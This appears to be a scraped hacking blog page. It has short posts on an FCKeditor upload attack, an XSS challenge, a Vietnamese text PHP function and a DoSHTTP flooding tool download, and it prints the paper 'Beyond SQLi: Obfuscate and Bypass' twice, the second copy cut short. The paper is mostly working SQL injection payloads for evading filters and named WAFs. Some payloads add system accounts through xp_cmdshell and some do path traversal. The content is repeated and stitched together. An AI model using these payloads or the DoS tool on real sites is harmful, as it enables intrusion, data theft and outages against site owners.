FCKeditor upload vuln

Video attack website with bug LFI and FCKeditor upload vuln.

FCKeditor upload vuln

Video attack website with bug LFI and FCKeditor upload vuln.

Can You XSS This?

Enter any text in the field below. Your attack will be reflected back to this page, sanitized by HTMLSanitizer. Try to XSS this!

Site: http://canyouxssthis.com/HTMLSanitizer/

http://i942.photobucket.com/albums/ad269/juno_okyo/Upload%20via%20Firefox/xss-1.png

Hàm chuyển chuỗi tiếng việt có dấu thành tiếng việt không dấu

Function khá hay các bạn áp dụng vào thẻ title hoặc vào các mục đích khác nhau.
Yêu cầu: Bạn phải lưu file php theo charset là UTF-8. Có thể dùng Notepad hoặc Editplus version mới nhất
function khongdau($str) {

$str = preg_replace("/(à|á|ạ|ả|ã|â|ầ|ấ|ậ|ẩ|ẫ|ă|ằ|ắ|ặ|ẳ|ẵ)/", 'a', $str);

$str = preg_replace("/(è|é|ẹ|ẻ|ẽ|ê|ề|ế|ệ|ể|ễ)/", 'e', $str);

$str = preg_replace("/(ì|í|ị|ỉ|ĩ)/", 'i', $str);

$str = preg_replace("/(ò|ó|ọ|ỏ|õ|ô|ồ|ố|ộ|ổ|ỗ|ơ|ờ|ớ|ợ|ở|ỡ)/", 'o', $str);

$str = preg_replace("/(ù|ú|ụ|ủ|ũ|ư|ừ|ứ|ự|ử|ữ)/", 'u', $str);

$str = preg_replace("/(ỳ|ý|ỵ|ỷ|ỹ)/", 'y', $str);

$str = preg_replace("/(đ)/", 'd', $str);



$str = preg_replace("/(À|Á|Ạ|Ả|Ã|Â|Ầ|Ấ|Ậ|Ẩ|Ẫ|Ă|Ằ|Ắ|Ặ|Ẳ|Ẵ)/", 'A', $str);

$str = preg_replace("/(È|É|Ẹ|Ẻ|Ẽ|Ê|Ề|Ế|Ệ|Ể|Ễ)/", 'E', $str);

$str = preg_replace("/(Ì|Í|Ị|Ỉ|Ĩ)/", 'I', $str);

$str = preg_replace("/(Ò|Ó|Ọ|Ỏ|Õ|Ô|Ồ|Ố|Ộ|Ổ|Ỗ|Ơ|Ờ|Ớ|Ợ|Ở|Ỡ)/", 'O', $str);

$str = preg_replace("/(Ù|Ú|Ụ|Ủ|Ũ|Ư|Ừ|Ứ|Ự|Ử|Ữ)/", 'U', $str);

$str = preg_replace("/(Ỳ|Ý|Ỵ|Ỷ|Ỹ)/", 'Y', $str);

$str = preg_replace("/(Đ)/", 'D', $str);

//$str = str_replace(" ", "-", str_replace("&*#39;","",$str));

return $str;

}

-Cách sử dụng:
<?php

$string = "Cộng hòa xã hội chủ nghĩa Việt Nam";

$xstring = khongdau($string);



echo $xstring;



//Kết quả:

//Output: Cong hoa xa hoi chu nghia Viet Nam

?>

Hàm chuyển chuỗi tiếng việt có dấu thành tiếng việt không dấu

Function khá hay các bạn áp dụng vào thẻ title hoặc vào các mục đích khác nhau.
Yêu cầu: Bạn phải lưu file php theo charset là UTF-8. Có thể dùng Notepad hoặc Editplus version mới nhất
function khongdau($str) {

$str = preg_replace("/(à|á|ạ|ả|ã|â|ầ|ấ|ậ|ẩ|ẫ|ă|ằ|ắ|ặ|ẳ|ẵ)/", 'a', $str);

$str = preg_replace("/(è|é|ẹ|ẻ|ẽ|ê|ề|ế|ệ|ể|ễ)/", 'e', $str);

$str = preg_replace("/(ì|í|ị|ỉ|ĩ)/", 'i', $str);

$str = preg_replace("/(ò|ó|ọ|ỏ|õ|ô|ồ|ố|ộ|ổ|ỗ|ơ|ờ|ớ|ợ|ở|ỡ)/", 'o', $str);

$str = preg_replace("/(ù|ú|ụ|ủ|ũ|ư|ừ|ứ|ự|ử|ữ)/", 'u', $str);

$str = preg_replace("/(ỳ|ý|ỵ|ỷ|ỹ)/", 'y', $str);

$str = preg_replace("/(đ)/", 'd', $str);



$str = preg_replace("/(À|Á|Ạ|Ả|Ã|Â|Ầ|Ấ|Ậ|Ẩ|Ẫ|Ă|Ằ|Ắ|Ặ|Ẳ|Ẵ)/", 'A', $str);

$str = preg_replace("/(È|É|Ẹ|Ẻ|Ẽ|Ê|Ề|Ế|Ệ|Ể|Ễ)/", 'E', $str);

$str = preg_replace("/(Ì|Í|Ị|Ỉ|Ĩ)/", 'I', $str);

$str = preg_replace("/(Ò|Ó|Ọ|Ỏ|Õ|Ô|Ồ|Ố|Ộ|Ổ|Ỗ|Ơ|Ờ|Ớ|Ợ|Ở|Ỡ)/", 'O', $str);

$str = preg_replace("/(Ù|Ú|Ụ|Ủ|Ũ|Ư|Ừ|Ứ|Ự|Ử|Ữ)/", 'U', $str);

$str = preg_replace("/(Ỳ|Ý|Ỵ|Ỷ|Ỹ)/", 'Y', $str);

$str = preg_replace("/(Đ)/", 'D', $str);

//$str = str_replace(" ", "-", str_replace("&*#39;","",$str));

return $str;

}

-Cách sử dụng:
<?php

$string = "Cộng hòa xã hội chủ nghĩa Việt Nam";

$xstring = khongdau($string);



echo $xstring;



//Kết quả:

//Output: Cong hoa xa hoi chu nghia Viet Nam

?>

DoSHTTP 2.5.1 (Professional Edition)

Download: http://www.socketsoft.net/products.asp?p=doshttp

Serial: (Only Juno_okyo's Blog Members)

Enjoy it!

Beyond SQLi: Obfuscate and Bypass

  |=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|


######
Info
######

Title : Beyond SQLi: Obfuscate and Bypass
Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Date : 2011-10-06


##########
Contents
##########

[0x00] - Introduction

[0x01] - Filter Evasion (Mysql)

[0x01a] - Bypass Functions and Keywords Filtering
[0x01b] - Bypass Regular Expression Filtering

[0x02] - Normally Bypassing Techniques

[0x03] - Advanced Bypassing Techniques

[0x03a] - HTTP Parameter Pollution: Split and Join
[0x03b] - HTTP Parameter Contamination

[0x04] - How to protect your website

[0x05] - Conclusion

[0x06] - References

[0x07] - Greetz To


#######################
[0x00] - Introduction
#######################

Welcome readers, this paper is a long attempt at documenting advanced SQL injection we have been working on.
This papers will disclose advanced bypassing and obfuscation techniques which many of them can be used in the real CMSs and WAFs. The proposed SQL injection statements in this paper are just some ways to bypass the protection.
There are still some other techniques can be used to attacks web applications but unfortunately we cannot tell you right now, as it is kept as a 0-day attack. However, this paper aims to show that there is no completely secure system
in the real world even though you spend more than 300,000 USD on a WAF.

This paper is divided into 7 sections but only from section 0x01 to 0x03 are about technical information.

Section 0x01, we give a details of how to bypass filter including basic, function and keyword.
Section 0x02, we offer normally bypassing techniques for bypass OpenSource and Commercial WAF.
Section 0x03, we talk in-depth Advanced bypassing techniques that separate into 2 section, "HTTP Parameter Contamination".
and "HTTP Pollution: Split and Join". Section 0x04, we guide to protect your own website on the right solution.
The last, section 0x05, It's conclusion from Section 0x01-0x04.


#################################
[0x01] - Filter Evasion (Mysql)
#################################

This section will describe filter evasion behaviors based on PHP and MySQL and how to bypass the filtering. Filter Evasion is a technique used to prevent SQL injection attacks. This technique can be done by using a SQL functions and keywords filtering or regular expressions.
This means that filter evasion relies heavily upon how storing a black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL Injection attacks.

+++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - Bypass Functions and Keywords Filtering
+++++++++++++++++++++++++++++++++++++++++++++++++++

Functions and keywords filtering prevents web applications from being attacked by using a functions and keywords black list. If an attackers submits an injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful.
However, if the attacker is able to manipulate the injection by using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a number of keywords and functions has to be put into the black list. However, this affects users
when the users want to submit input with a word in the black list. They will be unable to submit the input because it is being filtered by the black list. The following scenarios show cases of using functions and keywords filtering and bypassing techniques.


Keyword filer: and, or
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or)/i', $id)

THe keywords and, or are usually used as a simple test to determine whether a web application is vulnerable to SQL Injection attacks. Here is a simple bypass using &&, || instead of and, or respectively.

Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1 && 1 = 1
----------------------------------------------------------------------


Keyword filer: and, or, union
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union)/i', $id)

The keyword union is generally used to generate an malicious statement in order to select extra data from the database.

Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

** Remark: you have to know table name, column name and some data in the table, otherwise you have to get it from information_schema.columns table using other statement
e.g. use substring function to get each character of table names.
----------------------------------------------------------------------


Keyword filer: and, or, union, where
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select, '
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select, ', hex
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
----------------------------------------------------------------------


Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr, white space
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)
----------------------------------------------------------------------


From the above examples, it can be seen that there are a number of SQL statements used for bypassing the black list although the black list contains many keywords and functions.
Furthermore, there are a huge SQL statements, that are not on the mentioned examples, that can be used to bypass the black list.

Creating a bigger black list is not a good idea to protect your own websites. Remember, the more keywords and functions filtering, the less user friendly.


+++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - Bypass Regular Expression Filtering
+++++++++++++++++++++++++++++++++++++++++++++++

Regular expression filtering is a better solution to prevent SQL injection than keywords and functions filtering because it is used pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server.
However, many regular expression can also be bypassed. The following examples illustrate injection scripts that used to bypass regular expressions in the OpenSource PHPIDS 0.6.

PHPIDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or ' symbols.

[Code]---------------------------------------------------------------
filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1
[End Code]-----------------------------------------------------------

[Code]---------------------------------------------------------------
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
[End Code]-----------------------------------------------------------



########################################
[0x02] - Normally Bypassing Techniques
########################################

In this section, we mention about the techniques to bypass Web Application Firewall (WAF). First thing you need to know what's WAF?

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.
Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application,
many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
WAFs are often called 'Deep Packet Inspection Firewalls' coz they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service lacers.
Some modern WAF systems work both with attack signatures and abnormal behavior.

Now Let's rock to understand How to breach it with obfuscate, All WAFs can be bypassed with the time to understand their rules or using your imagination !!


1. Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
[End Code]-----------------------------------------------------------


2. Case Changing

Some WAFs filter only lowercase SQL keyword.

Regex Filter: /union\sselect/g

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
[End Code]-----------------------------------------------------------


3. Replaced keywords

Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
[End Code]-----------------------------------------------------------

Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
[End Code]-----------------------------------------------------------

For Mod_rewrite, Comments "/**/" cannot bypassed. So we use "%0b" replace "/**/".

Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html



4. Character encoding

Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only decode the input once so
double encoding can bypass certain filters as the WAF will decode the input once then filter while application keep
decoding the SQL statement executing

[Code]-----------------------------------------------------------------------------------------------------------------
http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
[End Code]-------------------------------------------------------------------------------------------------------------

Moreover, these techniques can combine to bypass Citrix Netscaler
- Remove all "NULL" words
- Use query encoding in some parts
- Remove the single quote character "'"
- And Have fun !!
Credit: Wendel Guglielmetti Henrique

and "Armorlogic Profense" prior to 2.4.4 was bypassed by URL-encoded newline character.


#Real World Example

1. NukeSentinel (Nuke Evolution)

[Nukesentinel.php Code]------------------------------------------------------------
// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if($blocker_row['activate'] > 0) {
if (stristr($nsnst_const['query_string'],'+union+') OR \
stristr($nsnst_const['query_string'],'%20union%20') OR \
stristr($nsnst_const['query_string'],'*/union/*') OR \
stristr($nsnst_const['query_string'],' union ') OR \
stristr($nsnst_const['query_string_base64'],'+union+') OR \
stristr($nsnst_const['query_string_base64'],'%20union%20') OR \
stristr($nsnst_const['query_string_base64'],'*/union/*') OR \
stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
die("BLOCK IP 1 " );
}
}
[End Code]-------------------------------------------------------------------------

We can bypass their filtering with these script:

Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…


2. Mod Security CRS (Credit: Johannes Dahse)

[SecRule]--------------------------------------------------------------------------
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
[End Rule]-------------------------------------------------------------------------

We can bypass their filtering with this code:

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
[End Code]--------------------------------------------------------------------------

From this attack, We can bypass Mod Security rule. Let see what's happen !!

MySQL Server supports 3 comment styles:
- From a "#" character to the end of the line
- From a "--" sequence to the end of the line
- From a /* sequence to the following */ sequence, as in the C programming language.
This syntax enables a comment to extend over multiple lines because the beginning and closing sequences need
not be on the same line.

The following example, We used "%0D%0A" as the new line characters. Let's take a look at the first request(to extract the DB user)
The resulting SQL payload looked something like this:

0 div 1 union#foo*/*/bar
select#foo
1,2,current_user

However the SQL payload, when executed by the MySQL DB, looked something like this:

0 div 1 union select 1,2,current_user


5. Buffer Overflow

WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data.
Give a large amount of data allows our code executing

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141
414141414141….)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
[End Code]--------------------------------------------------------------------------


6. Inline Comments (Mysql Only)

From MySQL 5.0 Reference Manual, MySQL Server supports some variants of C-style comments. These enable you to write
code that includes MySQL extensions, but is still portable, by using comments of the following form:

/*! MySQL-specific code */

In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement,
but other SQL servers will ignore the extensions.

A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline comments.

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
[End Code]--------------------------------------------------------------------------

Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can
add more inline comments

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
[End Code]--------------------------------------------------------------------------



########################################
[0x03] - Advanced Bypassing Techniques
########################################

In this section, we offer 2 techniques are "HTTP Pollution: Split and Join" and "HTTP Parameter Contamination".
From these techniques can bypass a lot of OpenSource and Commercial Web application firewall (WAF)


++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03a] - HTTP Parameter Pollution: Split and Join
++++++++++++++++++++++++++++++++++++++++++++++++++++

HTTP Pollution is a new class of injection vulnerability by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but
effective hacking technique. HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting
query string.

Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"

HTTP Parameter Handling: (Example)

+------------------------------------------------------------------+
| Web Server | Parameter Interpretation | Example |
+------------------------------------------------------------------+
| ASP.NET/IIS | Concatenation by comma | par1=val1,val2 |
| ASP/IIS | Concatenation by comma | par1=val1,val2 |
| PHP/Apache | The last param is resulting | par1=val2 |
| JSP/Tomcat | The first param is resulting | par1=val1 |
| Perl/Apache | The first param is resulting | par1=val1 |
| DBMan | Concatenation by two tildes | par1=val1~~val2 |
+------------------------------------------------------------------+

What would happen with WAFs that do Query String parsing before applying filters ? (HPP can be used even to bypass WAFs)
Some loose WAFs may analyze and validate a single parameter occurrence only (first or last one). Whenever the deal environment concatenates
multiple occurrences (ASP, ASP.NET, DBMan,…) an aggressor can split the malicious payload.

In a recent penetration test (Again), we were able to bypass a Imperva SecureSphere using "HPP+Inline Comment" on ASP/ASP.NET environment.
This technique can bypass other Commercial WAFs too. More information about "HPP+Inline Comment" show below:


#Real World Example:

1. Mod Security CRS (Credit: Lavakumar Kuppan)

The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked.

Forbidden: http://victim.com/search.aspx?q=select name,password from users

When the same payload is split against multiple parameters of the same name ModSecurity fails to block it.

Bypassed : http://victim.com/search.aspx?q=select name&q=password from users


Let's see what's happen, ModSecurity's interpretation is

q=select name
q=password from users

ASP/ASP.NET's interpretation is
q=select name,password from users

*Tip: This attack can be carried out on a POST variable in a similar way


2. Commercial WAFs

Forbidden: http://victim.com/search.aspx?q=select name,password from users

Now we use HPP+Inline comment to bypass it.

Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users


Analyzing, WAF's interpretation is

q=select/*
q=*/name
q=password/*
q=*/from/*
q=*/users

ASP/ASP.NET's interpretation is
q=select/*,*/name,password/*,*/from/*,*/users
q=select name,password from users


3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs)

Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT /add” --

Now we use HPP+Inline comment to bypass it.

Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --


Analyzing, WAF's interpretation is

id=1’; /*
id=1*/ EXEC /*
id=1*/ master..xp_cmdshell /*
id=1*/ “net user zeq3ul UrWaFisShiT” /*
id=1*/ --

ASP/ASP.NET's interpretation is
id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user zeq3ul UrWaFisShiT” /*,1*/ --
id=1’; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT” --


The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request.
This would prevent all variations of this attack.
However this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters.
And they might be designed to send and accept multiple HTTP parameters of the same name in the same request.To protect these applications the WAF
should also interpret the HTTP request in the same way the web application would.


++++++++++++++++++++++++++++++++++++++++
[0x03b] - HTTP Parameter Contamination
++++++++++++++++++++++++++++++++++++++++

HTTP Parameter Contamination (HPC) original idea comes from the innovative approach found in HPP research by
exploring deeper and exploiting strange behaviors in Web Server components, Web Applications and Browsers as a result of query string
parameter contamination with reserved or non expects characters.

Some facts:
- The term Query String is commonly used to refer to the part between the "?" and the end of the URI
- As defined in the RFC 3986, it is a series of field-value pairs
- Pairs are separated by "&" or ";"
- RFC 2396 defines two classes of characters:
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved : ; / ? : @ & = + $ ,
Unwise : { } | \ ^ [ ] `

Different web servers have different logic for processing special created requests. There are more web server, backend platform and special character combinations,
but we will stop here this time.

Query string and Web server response (Example)

+-----------------------------------------------------------+
| Query String | Web Servers response / GET values |
+-----------------------------------------------------------+
| | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
+-----------------------------------------------------------+
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test=1 | test=1 | test=1 |
| ?test=11 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |
+-----------------------------------------------------------+

Magic character "%" affect to ASP/ASP.NET

+--------------------------------------------------------------------+
| Keywords | WAF | ASP/ASP.NET |
+--------------------------------------------------------------------+
| sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. |
| ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx |
| <scr%ipt> | <scr%ipt> | <script> |
| <if%rame> | <if%rame> | <iframe> |
+--------------------------------------------------------------------+


#Real world examples:

1. Bypass Mod_Security SQL Injection rule (modsecurity_crs_41_sql_injection_attacks.conf)

[Filtered]----------------------------------------------------------------------------------

[Sun Jun 12 12:30:16 2011] [error] [client 192.168.2.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\bsys\\.user_objects\\b"
at ARGS_NAMES:sys.user_objects. [file "/etc/apache2/conf.d/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "110"] [id "959519"]
[rev "2.2.0"] [msg "Blind SQL Injection Attack"] [data "sys.user_objects"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"]
[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/"] [unique_id "TfT3gH8AAQEAAAPyLQQAAAAA"]

[End Code]------------------------------------------------------------------------------

Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell

2. Bypass URLScan 3.1 DenyQueryStringSequences rule

Forbidden: http://localhost/test.asp?file=../bla.txt
Bypassed : http://localhost/test.asp?file=.%./bla.txt

3. Bypass AQTRONIX Webknight (WAF for IIS and ASP/ASP.Net)

Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these
command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.


These types of hacking techniques are always interesting because they reveal new perspectives on security problems.
Many applications are found to be vulnerable to this kind of abuse because there are no defined rules for strange web server behaviors.
HPC can be used to extend HPP attack with spoofing real parameter name in the QUERY_STRING with "%" character on an IIS/ASP platform,
if there is WAF who blocks this kind of an attack.



######################################
[0x04] - How to protect your website
######################################

- Implement Software Development Life Cycle (SDLC)
- Secure Coding: Validate all inputs and outputs
- PenTest before online
- Harden it !!
- Revisit PenTest
- Deploy WAF (For Optional)
- Always check WAF patch


#####################
[0x05] - Conclusion
#####################

- WAFs is not the long-expected
- It's functional limitations, WAF is not able to protect a web app from all possible vulnerabilities
- It's necessary to adapt WAF filter to the particular web app being protected
- WAF doesn't eliminate a vulnerability, It just partly screens the attack vector


#####################
[0x06] - References
#####################

[1] WAF Bypass: SQL Injection - Kyle
[2] http://cwe.mitre.org/data/definitions/98.html
[3] HTTP Parameter Contamination - Ivan Markovic NSS
[4] Split and Join - Lavakumar Kuppan
[5] HTTP Parameter Pollution - Luca Carettoni and Stefano di Paola
[6] blog.spiderlabs.com


####################
[0x07] - Greetz To
####################

Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Special Thx : Exploit-db.com


----------------------------------------------------
Our disclosure purpose isn't helping security products but need to reveal theirs shit.
Security Products not able to 100% protect from damn config/coding of admin.
Just need a time and imagination for breach it !!
----------------------------------------------------

Beyond SQLi: Obfuscate and Bypass

  |=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|


######
Info
######

Title : Beyond SQLi: Obfuscate and Bypass
Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Date : 2011-10-06


##########
Contents
##########

[0x00] - Introduction

[0x01] - Filter Evasion (Mysql)

[0x01a] - Bypass Functions and Keywords Filtering
[0x01b] - Bypass Regular Expression Filtering

[0x02] - Normally Bypassing Techniques

[0x03] - Advanced Bypassing Techniques

[0x03a] - HTTP Parameter Pollution: Split and Join
[0x03b] - HTTP Parameter Contamination

[0x04] - How to protect your website

[0x05] - Conclusion

[0x06] - References

[0x07] - Greetz To


#######################
[0x00] - Introduction
#######################

Welcome readers, this paper is a long attempt at documenting advanced SQL injection we have been working on.
This papers will disclose advanced bypassing and obfuscation techniques which many of them can be used in the real CMSs and WAFs. The proposed SQL injection statements in this paper are just some ways to bypass the protection.
There are still some other techniques can be used to attacks web applications but unfortunately we cannot tell you right now, as it is kept as a 0-day attack. However, this paper aims to show that there is no completely secure system
in the real world even though you spend more than 300,000 USD on a WAF.

This paper is divided into 7 sections but only from section 0x01 to 0x03 are about technical information.

Section 0x01, we give a details of how to bypass filter including basic, function and keyword.
Section 0x02, we offer normally bypassing techniques for bypass OpenSource and Commercial WAF.
Section 0x03, we talk in-depth Advanced bypassing techniques that separate into 2 section, "HTTP Parameter Contamination".
and "HTTP Pollution: Split and Join". Section 0x04, we guide to protect your own website on the right solution.
The last, section 0x05, It's conclusion from Section 0x01-0x04.


#################################
[0x01] - Filter Evasion (Mysql)
#################################

This section will describe filter evasion behaviors based on PHP and MySQL and how to bypass the filtering. Filter Evasion is a technique used to prevent SQL injection attacks. This technique can be done by using a SQL functions and keywords filtering or regular expressions.
This means that filter evasion relies heavily upon how storing a black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL Injection attacks.

+++++++++++++++++++++++++++++++++++++++++++++++++++
